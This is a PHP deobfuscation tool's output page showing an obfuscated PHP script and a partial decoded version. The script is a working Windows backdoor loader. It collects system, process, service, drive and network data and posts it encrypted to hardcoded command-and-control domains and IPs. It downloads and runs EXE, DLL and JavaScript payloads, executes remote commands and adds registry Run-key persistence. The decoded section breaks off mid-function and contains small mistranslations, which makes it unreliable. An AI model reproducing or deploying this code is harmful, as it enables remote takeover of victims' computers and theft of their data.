Decode result (<?php goto GhGCf; qtomL: function rcbqD() { goto iEtoA; IvNw3: if (!$Dbe2H) { goto UBiN4; } goto ) PHP deobfuscation tool 2025-11-24 22:52:08

Decoded the code below.

<?php goto GhGCf; qtomL: function rcbqD() { goto iEtoA; IvNw3: if (!$Dbe2H) { goto UBiN4; } goto MzOOL; gFCj2: $wGaOo = null; goto sR1P9; G4neJ: $Nr7MT = $wGaOo["process"]; goto R1cu5; tUwir: $PS9aF .= $gGLsg; goto TkkmA; DtOG1: echo "$last_command == running" . PHP_EOL; goto lw6sx; xSyDZ: goto K...

Obfuscated php code

<?php 
 goto GhGCf; qtomL:
 function rcbqD() {
 goto iEtoA; IvNw3:
 if (!$Dbe2H) {
 goto UBiN4; }
 goto MzOOL;
gFCj2: $wGaOo = null;
 goto sR1P9; G4neJ:
 $Nr7MT = $wGaOo["process"];
 goto R1cu5;
 tUwir: $PS9aF .= $gGLsg;
goto TkkmA; DtOG1: echo "$last_command == running" . PHP_EOL;
goto lw6sx;
 xSyDZ: goto KSdn7;
goto X5ZKK; v6a3C: UBiN4: goto j83wj; TkkmA: KSdn7: goto IvNw3; NGQ1f: echo "$last_command == null" . PHP_EOL;
goto Jqr4f; XNNAh: fclose($V8__K[0]);
goto Y3VX_; iEtoA: global $wGaOo;
goto XCUPW; X5ZKK: eXYTz: goto tUwir; b57F5: $PS9aF = "out:" . PHP_EOL;
goto JHjwU;
gR3S1: $PS9aF .= "<empty>";
goto xSyDZ; JHjwU: if ($gGLsg) { goto eXYTz; } goto gR3S1; vmEZU: F9kwL: goto gFCj2; KWGqZ: $Dbe2H = stream_get_contents($V8__K[2]);
goto XNNAh; lw6sx: return null;
goto vmEZU; XCUPW: if (!(!$wGaOo || !isset($wGaOo["process"]) || !isset($wGaOo["pipes"]))) { goto iUh9Y; } goto NGQ1f;
gLhHj: $nSJJJ = proc_close($Nr7MT);
goto b57F5; j83wj: return $PS9aF;
goto c5Xkj; FUqxs: fclose($V8__K[2]);
goto gLhHj; Y3VX_: fclose($V8__K[1]);
goto FUqxs; R1cu5: $V8__K = $wGaOo["pipes"];
goto KcLcy; Jqr4f: return null;
goto b3ysM; sR1P9: $gGLsg = stream_get_contents($V8__K[1]);
goto KWGqZ; KcLcy: if (!proc_get_status($Nr7MT)["running"]) { goto F9kwL; } goto DtOG1; MzOOL: $PS9aF .= PHP_EOL . "err(" . $nSJJJ . "):" . PHP_EOL . $Dbe2H;
goto v6a3C; b3ysM: iUh9Y: goto G4neJ; c5Xkj: } goto z6oM9; sIg7z: vBmzE: goto EwTST; pzgi4: echo "active_cnt: " . $dCN4_ . PHP_EOL;
goto d1AUN; WOsYO: function BMLFv() { goto RoRvQ; t5ysc: return $qHIxs;
goto aKt0o; RoRvQ: $qHIxs = getenv("APPDATA") . "\\" . VJPpv() . rand(0, 1000000);
goto tHAes; tHAes: mkdir($qHIxs);
goto t5ysc; aKt0o: } goto qK03j; F_JOE: function rxiXT() { goto tin1z; r2rlA: $YvSKs ^= 0x15de8713;
goto yR9pu; iudFO: $YvSKs ^= $rNvND;
goto Ud2Db;
Ud2Db: $KyMPt = sprintf("%08x%08x", $t3Oc0, $YvSKs);
goto qsK_J; ZWOcq: $LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX);
goto WS5Kg; yR9pu: $rNvND = $rNvND + 0x29807914 & 0xffffffff;
goto TaEv6; GnW01: $YvSKs ^= $rNvND;
goto r3eEK; TaEv6: $fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff;
goto XLtXL; rWXXD: $YvSKs = $o28qH & 0xffffffff;
goto wBLcq; Cif7x: return ($USwKc !== '' ? "/" . $USwKc : '') . "/" . XnkeD(rand(0, 14)) . "&" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "/" . $FjQwC : '');
goto oHLbg; dgTra: $o28qH = (int) $Eh0Dq->getTimestamp() & (int) 1.8446744073709548E+19;
goto ZWOcq; XLtXL: $t3Oc0 ^= $fruA2;
goto iudFO; wBLcq: $fruA2 = $LSet6 >> 32 & 0xffffffff;
goto tnZ3G; xFAOW: $t3Oc0 ^= 0x86ad5709;
goto r2rlA; r3eEK: $YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff;
goto DsbEr; QMIwY: $t3Oc0 ^= 0x219f7609;
goto uIg6N; Tw4a2: $FjQwC = XnkeD(rand(0, 14));
goto Cif7x; tnZ3G: $rNvND = $LSet6 & 0xffffffff;
goto Zfmgf; qsK_J: $U0J5z = sprintf("%08x%08x", $fruA2, $rNvND);
goto Mn4pt; DsbEr: $t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff;
goto QMIwY; Zfmgf: $t3Oc0 ^= $fruA2;
goto GnW01; tin1z: $Eh0Dq = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
goto dgTra; WS5Kg: $t3Oc0 = $o28qH >> 32 & 0xffffffff;
goto rWXXD; Mn4pt: $USwKc = XNked(rand(0, 14));
goto Tw4a2; uIg6N: $YvSKs ^= 0xd1769498;
goto xFAOW; oHLbg: } goto ybxmE; ph3TX: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto sIg7z; NxBG4: $LcYWr = 10;
goto vSPwP; ztZND: $pC2k6 = chr(0xa);
goto lakjl; Pkc_7: return;
goto m8M9L; ybxmE: function mNFE9() { goto SLN3T; YlAz4: throw new Exception("Failed to execute command");
goto WK6XK; Mjmq1: exec("powershell -c " . eCI0t("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $pcI7I, $xv08g);
goto qpuf_; TAt8V: $pcI7I = '';
goto AjEZG; AjEZG: exec("powershell -c " . eCI0t("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $pcI7I, $xv08g);
goto WaE3I; rDHRq: $JGJW0["processes"] = json_decode(implode($pC2k6, $pcI7I), true);
goto CZvJe; xeNbX: throw new Exception("Failed to execute command");
goto yw8sc; dqSAy: throw new Exception("Failed to execute command");
goto fBXNh; KtFyp: $JGJW0["systeminfo"] = json_decode(implode($pC2k6, $pcI7I), true);
goto szlN5; fBXNh: JqFr0: goto V2trJ; SwHwH: hAxYv: goto KtFyp; CyXGe: oI7qv: goto GNCS4; szlN5: $pcI7I = '';
goto kvpOd; O_u62: if (!($xv08g !== 0)) { goto hAxYv; } goto MZ8Bw; xik0u: exec("powershell -c " . eCI0t("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
goto hGwbL; rTwG_: $JGJW0["other"]["id_loader"] = 43;
goto H8fAn; V2trJ: $JGJW0["other"]["version_build"] = $jIDpK;
goto o5pQ9; H8fAn: $JGJW0["other"]["runas"] = $pcI7I[0] ?? "UNKNOWN";
goto Uq1i5; SLN3T: global $jIDpK, $szWC8, $pC2k6;
goto Gb2wC; h5Dt2: $pcI7I = '';
goto A3qh6; oqutG: exec("powershell -c " . Eci0T("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
goto O_u62;
gHZpy: $JGJW0["arp"] = json_decode(implode($pC2k6, $pcI7I), true);
goto h5Dt2; O1ZSi: CXelO: goto rDHRq; zTeIp: exec("powershell -c " . eci0t("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $pcI7I, $xv08g);
goto VXiWg; WK6XK: J0rGW: goto gHZpy; kIhB2: $pcI7I = '';
goto xik0u; MZ8Bw: throw new Exception("Failed to execute command");
goto SwHwH; JZ8SA: throw new Exception("Failed to execute command");
goto O1ZSi; A3qh6: return $JGJW0;
goto ET34Z; hGwbL: if (!($xv08g !== 0)) { goto CXelO; } goto JZ8SA; GNCS4: $JGJW0["services"] = json_decode(implode($pC2k6, $pcI7I), true);
goto zzFnW; yw8sc: J78O1: goto KaCH2; VXiWg: if (!($xv08g !== 0)) { goto J78O1; } goto xeNbX; WaE3I: if (!($xv08g !== 0)) { goto J0rGW; } goto YlAz4; CZvJe: $pcI7I = '';
goto Mjmq1; zzFnW: $pcI7I = '';
goto zTeIp; kvpOd: exec("powershell -c " . ECI0T("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM')  { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $pcI7I, $xv08g);
goto dH2kx; dH2kx: if (!($xv08g !== 0)) { goto JqFr0; } goto dqSAy; Uq1i5: $JGJW0["other"]["type_file"] = "PHP";
goto kIhB2;
gn1Mi: throw new Exception("Failed to execute command");
goto CyXGe; o5pQ9: $JGJW0["other"]["id_local"] = mt_rand(0, 100000000);
goto rTwG_; qpuf_: if (!($xv08g !== 0)) { goto oI7qv; } goto gn1Mi; KaCH2: $JGJW0["drives"] = json_decode(implode($pC2k6, $pcI7I), true);
goto TAt8V; Gb2wC: $JGJW0 = [];
goto oqutG; ET34Z: } goto l4tr9; dfbng: if (!true) { goto w_p_e; } goto bc_XP; GhGCf: $szWC8 = chr(0x22);
goto ztZND; kImNn: function ecI0T($b3TRq) { global $szWC8; return $szWC8 . $b3TRq . $szWC8; } goto F_JOE; xaPFx: function A2uxo($xbNO5) { goto DmaWr; SHkBb: $ERqBI = $xbNO5 . $rasAm;
goto ENAdj; ENAdj: return gzencode($ERqBI, 5, FORCE_GZIP);
goto LVrZW; bA6ex: R7s9b($xbNO5, $rasAm);
goto SHkBb; M_vHj: $rasAm = pack("V", $Ot6LN);
goto bA6ex; DmaWr: $Ot6LN = mt_rand(0, 100000000);
goto M_vHj; LVrZW: } goto Ikv0Q; teN0x: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
goto azANG; m8M9L: Hbr23: goto C4SdR; smHwj: echo "delay: " . $LcYWr . PHP_EOL;
goto pzgi4; uRlZE: function UrHlx() { goto pKxxt; bSPgh: if (!(!$ZqddJ || !preg_match_all("/\s-r\s/", $ZqddJ))) { goto w5I3u; } goto Dzjht; n1kqv: $Y72oh = preg_split("/php\.exe.*?\s-r\s+/", $xU41z, 2);
goto eOgzd; RNPOv: zRlqv: goto Bjbd0; FnYn0: $oyBW1 = __FILE__;
goto bRGWU; iGUoA: if (QrOFA()) { goto zRlqv; } goto FnYn0; hOX6z: Uxm1w: goto Dzygw; Bjbd0: $oyBW1 = dirname(PHP_BINARY) . xNked(12) . ".txt";
goto G84tC; Dzygw: exec("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v " . Eci0t(VjppV()) . " /t REG_SZ /d " . eci0t("\\" . $szWC8 . PHP_BINARY . "\\" . $szWC8 . " \\" . $szWC8 . $oyBW1 . "\\" . $szWC8) . " /f");
goto BEWR2; VobaU: $pDMmF = explode($pC2k6, $ZqddJ, 2);
goto KnYOk; pKxxt: global $szWC8, $pC2k6;
goto iGUoA; xC0RO: w5I3u: goto VobaU; BEWR2: return true;
goto oVM4F; Mb8m7: file_put_contents($oyBW1, $uJtGi);
goto hOX6z; eOgzd: $uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : '';
goto Mb8m7; Dzjht: return false;
goto xC0RO; KnYOk: $xU41z = trim($pDMmF[1] ?? '');
goto n1kqv; G84tC: $ZqddJ = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
goto bSPgh; bRGWU: goto Uxm1w;
goto RNPOv; oVM4F: } goto fc1nJ; z6oM9: function lFVIE($xLjoz, $d0PbW) { goto zxRUJ; akcjb: $o_rCT = "powershell.exe -WindowStyle Hidden -c " . ECi0t("Start-Process -WindowStyle Hidden -FilePath '" . $xLjoz . "'" . ($d0PbW ? " -ArgumentList '" . preg_replace("/" . $szWC8 . "/", "\\" . $szWC8, $d0PbW) . "'" : ''));
goto dEHsl; dEHsl: echo $o_rCT . $pC2k6 . $pC2k6;
goto QId0W; zxRUJ: global $szWC8, $pC2k6;
goto akcjb; QId0W: shell_exec($o_rCT);
goto FFokY; FFokY: } goto WOsYO; YWsb9: function Y40sz($nG_P0, $Yem6z) { goto XzqaQ; w4_1H: $abtZm->close();
goto gTt8M; u71rV: rewind($PH23F);
goto F1pv_; SvUr2: if (!($Mbxm4 !== true)) { goto d2ZIq; } goto Ix7oY; CKc57: return true;
goto siNDm; D_vXs: fclose($PH23F);
goto nWlDf; Rqxww: $abtZm->close();
goto D_vXs; W7Pvu: return false;
goto FCsu7; Ix7oY: fclose($PH23F);
goto W7Pvu; zLO6Y: tttcO: goto w4_1H; FCsu7: d2ZIq: goto RjHFo;
ghuFk: if (mkdir($Yem6z, 0777, true)) { goto isOEF; } goto i7rJO; RjHFo: if ($abtZm->extractTo($Yem6z)) { goto tttcO; } goto Rqxww; XzqaQ: if (file_exists($Yem6z)) { goto qw6IQ; } goto ghuFk; p5QAD: $cTc0_ = file_get_contents($nG_P0);
goto DwC7G; i7rJO: return false;
goto BAppL; YFhHt: $Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["uri"]);
goto SvUr2; BAppL: isOEF: goto tkJFY; tkJFY: qw6IQ: goto p5QAD;
gTt8M: fclose($PH23F);
goto CKc57; F1pv_: $abtZm = new XdeZr();
goto YFhHt; DaxKI: fwrite($PH23F, $cTc0_);
goto u71rV; nWlDf: return false;
goto zLO6Y; DwC7G: $PH23F = tmpfile();
goto DaxKI; siNDm: } goto uRlZE; tBEQV: if (count($h0b7d) > 0) { goto DGU7d; } goto teN0x; PI6eX: $dlA_m = 0;
goto EgCuT; OUc5x: goto V3Oj2;
goto JgSSO; vwBQl: $h0b7d = ["windows-msgas.com", "event-datamicrosoft.live", "varying-rentals-calgary-predict.trycloudflare.com"];
goto tBEQV; XAM1e: $JcEot = 80;
goto Klamn; S4yY7: DGU7d: goto ph3TX; KMXag: $wGaOo = null;
goto NvD7d; l4tr9: function r7s9B(&$xbNO5, $eAmVW) { goto jUYbm; jUYbm: $s9r5b = ord($eAmVW[0]);
goto zADLb; bnowv: W3BJA: goto S_cN9; tTRhB: $Mc_Hp = 0;
goto Ast8k; ZQtcn: goto kAq95;
goto bnowv; HPUYH: $xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256);
goto ziig9; IYGwm: if (!($Mc_Hp < $cbiCS)) { goto W3BJA; } goto TXIrG; Ast8k: kAq95: goto IYGwm; TXIrG: $s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256;
goto HPUYH; I0zBE: $kt3y8 = strlen($eAmVW);
goto tTRhB; ziig9: kp_B5: goto qKS6q; zADLb: $cbiCS = strlen($xbNO5);
goto I0zBE; qKS6q: ++$Mc_Hp;
goto ZQtcn; S_cN9: } goto xaPFx; Yi5pH: $dCN4_ = 0;
goto Bvdh_; Klamn: $D_3Y7 = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
goto Yi5pH; NvD7d: function deG1t($d0PbW) { goto U26fL; U26fL: global $wGaOo;
goto rKPLw; rKPLw: $qA50S = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
goto vIbJr; vIbJr: $Nr7MT = proc_open($d0PbW, $qA50S, $V8__K);
goto Fk4aN; HUWz5: OIHx8: goto ImEOy; q1kMs: return "<failed>";
goto HUWz5; ImEOy: $wGaOo = ["process" => $Nr7MT, "pipes" => $V8__K];
goto Ir0ws; Fk4aN: if (is_resource($Nr7MT)) { goto OIHx8; } goto q1kMs; Ir0ws: } goto qtomL; Ikv0Q: function EtUpz($A4YkN, $xbNO5) { goto uiUap; IAKYX: $Ql4QK = (int) $fUPyD[1];
goto aHYEC; aHYEC: oo9y0: goto P9uXG; DtSgv: $HhbRp = null;
goto xRdNz; IF9yw: $H6YXK = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $xbNO5, "ignore_errors" => true, "timeout" => 20]];
goto YMMrn; Ls2Pd: if (!isset($http_response_header[0])) { goto ycYgX; } goto XK2NZ; upemk: $nuWcv = stream_context_create($H6YXK);
goto DtSgv; P9uXG: ycYgX: goto r77la; dG83c: if (!($RwYxj === false)) { goto Tdx4n; } goto asX3w; YMMrn: $nG_P0 = "http://" . $A4YkN . ":" . $JcEot . rXiXT();
goto upemk; uiUap: global $JcEot;
goto IF9yw; PEG3G: restore_error_handler();
goto dG83c; r77la: return ["content" => $RwYxj, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Ql4QK];
goto A9CR4; KYMz3: $Ql4QK = 0;
goto Ls2Pd; asX3w: throw new Exception("HTTP request failed: " . ($HhbRp ?: "Unknown error"));
goto QdSL7; XK2NZ: preg_match("/HTTP\/\d\.\d\s+(\d{3})/", $http_response_header[0], $fUPyD);
goto K4aXs; B31AZ: $RwYxj = file_get_contents($nG_P0, false, $nuWcv);
goto PEG3G; K4aXs: if (!isset($fUPyD[1])) { goto oo9y0; } goto IAKYX; xRdNz: set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) { $HhbRp = $Mxyq3; });
goto B31AZ; QdSL7: Tdx4n: goto KYMz3; A9CR4: } goto YWsb9; azANG: goto vBmzE;
goto S4yY7; Bvdh_: $rst7P = MNfE9();
goto GGsaL; S7l7m: LfVIE(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . ECi0T(__FILE__) . " 1");
goto Pkc_7; C4SdR: $jIDpK = 20;
goto XAM1e; lakjl: if (!($argc < 2 && !qrOfa() || !extension_loaded("zip") && file_exists(__FILE__))) { goto Hbr23; } goto S7l7m; EwTST: $TZ64Y = 200;
goto PI6eX; vSPwP: $b2dL6 = ["159.69.187.78", "64.95.12.71", "184.95.51.165"];
goto vwBQl; GGsaL: function QROfA() { global $argv; return $argv[0] === "Standard input code"; } goto kImNn; fc1nJ: function vJppV() { goto oeWc2; JOrZw: $inBis = array_values($inBis);
goto jSXR6; jSXR6: print_r($inBis);
goto LF76G; oeWc2: $inBis = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
goto FqHis; FqHis: $inBis = array_diff($inBis, [".", ".."]);
goto JOrZw; LF76G: return $inBis[rand(0, count($inBis) - 1)];
goto W_MW9; W_MW9: } goto VN3bi; qK03j: function mOJ2M($A4YkN) { goto E6092; oe9Eo: bVOXu: goto X5UZm; Kh4oY: if (!(($u7kKd = RCbQd()) !== null)) { goto bVOXu; } goto kMs0H; X5UZm: $uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT)));
goto CjTrc; nJvML: if (!($Ql4QK !== 200)) { goto rweeZ; } goto Zq6SB; TG7Ws: $Ql4QK = $uJtGi["code"];
goto kL4WH; uS_iH: Qi1fs: goto b5HGd; I7s0k: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1);
goto OF1U2; VXOzv: switch ($miAdf) { case $D_3Y7["CMD"]: goto KbFcF; Hwxi8: DEg1T($o0HyG);
goto dYUqj; dYUqj: return;
goto F4zqm; KbFcF: echo "CMD" . PHP_EOL;
goto Hwxi8; F4zqm: case $D_3Y7["ACTIVE"]: goto szNmR; WEBBC: return;
goto MLaj6; szNmR: echo "ACTIVE" . PHP_EOL;
goto kN7r9; kN7r9: $dCN4_ = unpack("V", $o0HyG)[1];
goto WEBBC; MLaj6: case $D_3Y7["AUTORUN"]: goto yTNdL; A_UVE: URHlX();
goto HFtUq; HFtUq: return;
goto xPlUz; yTNdL: echo "AUTORUN" . PHP_EOL;
goto A_UVE; xPlUz: case $D_3Y7["OFF"]: echo "OFF" . PHP_EOL; exit(0); case $D_3Y7["EXE"]: goto yCtrZ; uBb1t: file_put_contents($xLjoz, $o0HyG);
goto d0zSU; yCtrZ: echo "EXE" . PHP_EOL;
goto XW7m0; XW7m0: $xLjoz = BMlfV() . "\\" . xNkEd(8) . ".exe";
goto uBb1t; d0zSU: goto nJLGE;
goto NVxS3; NVxS3: case $D_3Y7["DLL"]: goto W1nPU; umqro: $yYiH5 = bmlfV() . "\\" . XnkeD(8) . ".png";
goto v9BNu; m2qgo: $d0PbW = ecI0T($yYiH5) . " start";
goto FWxGw; VqA0a: goto nJLGE;
goto E92UY; v9BNu: $xLjoz = "C:\Windows\System32
undll32.exe";
goto m2qgo; FWxGw: file_put_contents($yYiH5, $o0HyG);
goto VqA0a; W1nPU: echo "DLL" . PHP_EOL;
goto umqro; E92UY: case $D_3Y7["JS"]: goto yuPJ6; yuPJ6: echo "JS" . PHP_EOL;
goto h_KkM; h_KkM: $xLjoz = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64
ode.exe";
goto bPtdr; ig9mY: echo "failed install nodejs" . PHP_EOL;
goto qk3BX; bPtdr: if (!(!file_exists($xLjoz) && !y40SZ("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) { goto W3oml; } goto ig9mY; Y_Aem: file_put_contents($d0PbW, $o0HyG);
goto zCIdG; tdIKS: $d0PbW = BmLfv() . "\\" . XNKed(8) . ".jpg";
goto Y_Aem; zCIdG: goto nJLGE;
goto w3k0S; qk3BX: return;
goto uD0kN; uD0kN: W3oml: goto tdIKS; w3k0S: default: goto s2nJZ; TNSP3: file_put_contents(BmlfV() . "\\" . XnkeD(8) . ".txt", $o0HyG);
goto I3SlV; I3SlV: return;
goto rdFY5; s2nJZ: echo "OTHER" . PHP_EOL;
goto TNSP3; rdFY5: } goto uS_iH; nCcIW: $oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG));
goto OUirS; E6092: global $rst7P, $D_3Y7, $szWC8, $dCN4_;
goto Kh4oY; lsNbT: lfViE($xLjoz, $d0PbW);
goto PhVCY; kMs0H: $rst7P["cmd"] = $u7kKd;
goto oe9Eo; NRL85: rweeZ: goto nCcIW; OUirS: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4);
goto BdwFO; b5HGd: nJLGE: goto lsNbT; kL4WH: if (!($Ql4QK == 204)) { goto zQM0Z; } goto tuOdf; CjTrc: unset($rst7P["cmd"]);
goto O4_i1; OF1U2: $d0PbW = null;
goto VXOzv; BdwFO: R7s9B($o0HyG, $oAl9r);
goto PCb5g; Zq6SB: throw new Exception("HTTP request failed: " . $Ql4QK);
goto NRL85; tuOdf: echo "204" . PHP_EOL;
goto ojXAZ; PCb5g: $miAdf = ord($o0HyG[strlen($o0HyG) - 1]);
goto I7s0k; VE56b: zQM0Z: goto nJvML; O4_i1: $o0HyG = $uJtGi["content"];
goto TG7Ws; ojXAZ: return;
goto VE56b; PhVCY: } goto NxBG4; bc_XP: try { goto G8o3o; b3ZA4: if ($dlA_m >= $TZ64Y + 10) { goto SuLft; } goto dqR1N; KKvsW: xVHKd: goto PprER; G8o3o: echo $A4YkN . PHP_EOL;
goto KeU2e; PprER: $dlA_m = 0;
goto LWgVS; MQiTv: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto MKzlP; Lrde_: goto WdXyd;
goto jp4cX; WAede: $dCN4_--;
goto iaT6S; FHp7r: goto yt0U2;
goto KKvsW; eWaiy: $LcYWr = 10;
goto WAede; LWgVS: yt0U2: goto Lrde_; iaT6S: c81pJ: goto b3ZA4; E09nS: if ($dCN4_ > 0) { goto wbBrA; } goto rK6Ut; Nq2kv: $dlA_m = $TZ64Y - 10;
goto ch1LL; RCrAZ: WdXyd: goto xHwH3; x6bWr: wbBrA: goto eWaiy; dqR1N: if ($dlA_m < $TZ64Y) { goto xVHKd; } goto bIkHK; ch1LL: if (!(count($h0b7d) > 0)) { goto njjkr; } goto MQiTv; MKzlP: njjkr: goto RCrAZ; rK6Ut: $LcYWr = 5 * 60;
goto WieJG; KeU2e: echo $dlA_m . PHP_EOL;
goto xMM4K; bIkHK: $dlA_m++;
goto FHp7r; WieJG: goto c81pJ;
goto x6bWr; jp4cX: SuLft: goto Nq2kv; xMM4K: moJ2m($A4YkN);
goto E09nS; xHwH3: } catch (Throwable $Umveq) { goto wptzU; puz2n: $LcYWr = 10;
goto R4mvO; QavQA: WGLsq: goto puz2n; kSgzE: $dlA_m++;
goto JoIY7; Y0Lll: goto WGLsq;
goto F6Iwd; wptzU: echo $pC2k6 . "Error: " . $Umveq->getMessage() . $pC2k6;
goto kSgzE; R4mvO: $dCN4_ = 0;
goto qURNi; JoIY7: if ($dlA_m < $TZ64Y && count($h0b7d) > 0) { goto C78vx; } goto m7fon; F6Iwd: C78vx: goto JCQys; JCQys: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto QavQA; m7fon: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
goto Y0Lll; qURNi: } goto smHwj; EgCuT: V3Oj2: goto dfbng; d1AUN: sleep($LcYWr);
goto OUc5x; VN3bi: function XNKeD($zcvYL = 16) { goto yWThk; nL0BB: $b3TRq .= $Ke3ba[rand(0, $brHta - 1)];
goto GkO5U; yWThk: $Ke3ba = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
goto HuuRn; rIPsG: if (!($Mc_Hp < $zcvYL)) { goto pP0ox; } goto nL0BB; kdKdZ: NWTYT: goto rIPsG; b8Tav: goto NWTYT;
goto DGVWR; o0GmT: return $b3TRq;
goto l_C7v; HuuRn: $brHta = strlen($Ke3ba);
goto fL917; DGVWR: pP0ox: goto o0GmT; GEnfc: $Mc_Hp++;
goto b8Tav; fL917: $b3TRq = '';
goto DMxcX; GkO5U: o61fz: goto GEnfc; DMxcX: $Mc_Hp = 0;
goto kdKdZ; l_C7v: } goto KMXag; JgSSO: w_p_e: 
 ?>

Decoded(de-Obfuscated) php code

<?php

$szWC8 = "\"";
$pC2k6 = "\n";
if (!($argc < 2 && !qrOfa() || !extension_loaded("zip") && file_exists("/var/www/html/input.php"))) {
    $jIDpK = 20;
    $JcEot = 80;
    $D_3Y7 = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
    $dCN4_ = 0;
    $rst7P = MNfE9();
    function QROfA()
    {
        global $argv;
        return $argv[0] === "Standard input code";
    }
    function ecI0T($b3TRq)
    {
        global $szWC8;
        return $szWC8 . $b3TRq . $szWC8;
    }
    function rxiXT()
    {
        $Eh0Dq = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
        $o28qH = (int) $Eh0Dq->getTimestamp() & -4096;
        $LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX);
        $t3Oc0 = $o28qH >> 32 & 0xffffffff;
        $YvSKs = $o28qH & 0xffffffff;
        $fruA2 = $LSet6 >> 32 & 0xffffffff;
        $rNvND = $LSet6 & 0xffffffff;
        $t3Oc0 ^= $fruA2;
        $YvSKs ^= $rNvND;
        $YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff;
        $t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff;
        $t3Oc0 ^= 0x219f7609;
        $YvSKs ^= 0xd1769498;
        $t3Oc0 ^= 0x86ad5709;
        $YvSKs ^= 0x15de8713;
        $rNvND = $rNvND + 0x29807914 & 0xffffffff;
        $fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff;
        $t3Oc0 ^= $fruA2;
        $YvSKs ^= $rNvND;
        $KyMPt = sprintf("%08x%08x", $t3Oc0, $YvSKs);
        $U0J5z = sprintf("%08x%08x", $fruA2, $rNvND);
        $USwKc = XNked(rand(0, 14));
        $FjQwC = XnkeD(rand(0, 14));
        return ($USwKc !== '' ? "/" . $USwKc : '') . "/" . XnkeD(rand(0, 14)) . "&" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "/" . $FjQwC : '');
    }
    function mNFE9()
    {
        global $jIDpK, $szWC8, $pC2k6;
        $JGJW0 = [];
        exec("powershell -c " . Eci0T("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
        if (!($xv08g !== 0)) {
            $JGJW0["systeminfo"] = json_decode(implode($pC2k6, $pcI7I), true);
            $pcI7I = '';
            exec("powershell -c " . ECI0T("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM')  { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $pcI7I, $xv08g);
            if (!($xv08g !== 0)) {
                $JGJW0["other"]["version_build"] = $jIDpK;
                $JGJW0["other"]["id_local"] = mt_rand(0, 100000000);
                $JGJW0["other"]["id_loader"] = 43;
                $JGJW0["other"]["runas"] = $pcI7I[0] ?? "UNKNOWN";
                $JGJW0["other"]["type_file"] = "PHP";
                $pcI7I = '';
                exec("powershell -c " . eCI0t("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
                if (!($xv08g !== 0)) {
                    $JGJW0["processes"] = json_decode(null, true);
                    $pcI7I = '';
                    exec("powershell -c " . eCI0t("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $pcI7I, $xv08g);
                    if (!($xv08g !== 0)) {
                        $JGJW0["services"] = json_decode(null, true);
